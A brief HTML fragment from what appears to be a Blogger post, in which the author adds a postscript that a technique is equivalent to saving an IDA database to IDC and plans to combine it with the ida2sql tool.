<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">P.P.P.S. This is effectively the same as saving the database to IDC. I will combine it with <a href="http://dkbza.org/ida2sql.html">ida2sql</a>.</span></div></div></span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0